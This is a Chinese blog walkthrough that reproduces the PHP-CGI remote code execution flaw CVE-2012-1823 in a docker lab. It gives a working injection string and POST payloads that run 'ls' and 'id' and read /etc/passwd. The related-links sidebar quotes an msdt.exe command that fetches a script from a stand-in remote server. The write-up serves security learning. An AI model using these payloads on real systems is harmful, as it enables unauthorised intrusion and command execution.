PHP-CGI远程代码执行漏洞CVE-2012-1823复现

最新推荐文章于 2024-05-12 22:34:51 发布
最新推荐文章于 2024-05-12 22:34:51 发布
阅读量866 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 php 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56123950/article/details/117982623
版权

目录

CVE-2012-1823

漏洞原因

用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。

影响版本

< php-5.3.12 or php < 5.4.2
mod方式、fpm方式不受影响

漏洞利用

cgi模式下的参数

-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

开启实验环境
 sudo docker-compose bulid
 sudo docker-compose up -d

在这里插入图片描述
在这里插入图片描述
然后ifconfig查看ip地址
在这里插入图片描述

访问网站

该站点在8080端口,直接访问
在这里插入图片描述
在后面加上-s,可发现返回源码,则说明存在此漏洞
在这里插入图片描述

制造漏洞

执行代码

用burpsuit抓post请求的数据包,然后修改数据包,可以php远程代码执行
我们先打开burpsuit,抓到数据包,传到repeater里
在这里插入图片描述
制作文件包含漏洞

-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input


<?php echo system("ls"); ?>

插入代码将GET请求方式改为POST,发送数据包,成功执行。
在这里插入图片描述
还可以返回id值

<?php echo shell_exec("id"); ?>

在这里插入图片描述
查看对方的/etc/passwd的文件
在这里插入图片描述

移除漏洞环境

不要离开当前目录,漏洞测试结束后,执行如下命令移除环境

sudo docker-compose down
从不专注的人
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP-CGI远程代码执行漏洞CVE-2012-1823)
千寻的博客
03-06 1180
就是用户请求的`querystring`(`querystring`字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了`php-cgi`的参数,最终导致了一系列结果。
CVE-2012-1823 漏洞
Jay17的博客
02-10 1684
CVE-2012-1823 漏洞
CVE-2012-1823)PHP-CGI远程代码执行漏洞(80端口)
最新发布
m0_62670778的博客
05-12 553
php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi。
PHP-CGI远程代码执行漏洞
weixin_69925635的博客
07-18 469
使用kali-msf6对ubuntu的php-CGI漏洞攻击
php-cgi 攻击,PHP安全之以CGI 模式安装时可能遇到的攻击及解决办法
weixin_39929687的博客
03-27 377
情形一:只运行公开的文件如果 web 服务器中所有内容都受到密码或 IP 地址的访问限制,就不需要设置这些选项。如果 web 服务器不支持重定向,或者 web 服务器不能和 PHP 通信而使访问请求变得更为安全,可以在 configure 脚本中指定--enable-force-cgi-redirect选项。除此之外,还要确认 PHP 程序不依赖其它方式调用,比如通过直接的http://my...
[vulhub]:CVE-2012-1823 php-cgi远程代码执行
qq_43756450的博客
02-28 413
[vulhub]:CVE-2012-1823 php-cgi远程代码执行 Author:badbird Time:2020-2-6 该漏洞只出在以cgi模式运行的php中。影响范围 < 5.3.12 < 5.4.2 0x01 预备知识 ​ 什么是CGI? ​ Common Gateway Interface 即“通用网关接口”。用于处理浏览器(客户端)向服务器发送的数据,在服务器上部署。CGI实际上是一种数据处理的协议,相当于Web服务器“背后的女人”。 ​ CGI做了什么工作?
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实过程中看起来并不乐观。 我们在...
IIS7限制PHP-CGI.exe数量_服务器php-cgi.exe进程过多,导致CPU占用100%的解决
weixin_39840733的博客
03-09 660
1、检查系统盘空间。查看系统临时文件是否过多,mysql数据库的临时文件默认存到了c:/windows/temp,导致累积了几万甚至上百万的小文件,压垮系统盘。del *.* 删除所有文件2、在IIS中并没有内置对PHP语言的支持,使用PHP,必须自行安装。PHP可以安装为CGI模式或者ISAPI模式,由于ISAPI模式具有更高的性能,建议大家使用ISAPI模式。3、如能修改程序,建议将程序配置文...
CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战
Yatere的天平秤
05-07 2063
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。  另外关于RC
PHP反序列化漏洞之CGI远程代码执行漏洞
LCW991207的博客
08-17 539
CVE-2012-1823就是php-cgi这个sapi出漏洞,本漏洞只出在以cgi模式运行的php中。
phpcgi 代码执行 (CVE-2012-1823)
m0_49936858的博客
08-22 559
CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。可见,获取querystring后进行解码,如果第一个字符是-则设置skip_getopt,也就是不要获取命令行参数。
网络安全80端口—-PHP CGI参数注入执行漏洞
旺仔Sec&blog
07-24 1323
80——-PHP CGI参数注入执行漏洞
CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1322
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
cve-2022-30190 msdt远程代码执行漏洞
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值